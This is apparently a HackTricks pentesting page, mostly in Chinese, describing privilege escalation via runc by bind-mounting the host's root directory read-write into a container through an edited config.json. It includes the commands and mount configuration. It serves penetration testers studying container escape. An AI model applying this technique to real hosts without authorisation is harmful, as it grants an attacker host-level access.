RunC Privilege Escalation

从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

基本信息

如果您想了解更多关于 runc 的信息,请查看以下页面:

2375, 2376 Pentesting Docker

PE

如果您发现宿主机中安装了 runc,您可能能够运行一个容器,挂载宿主机的根 / 目录

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

最后更新于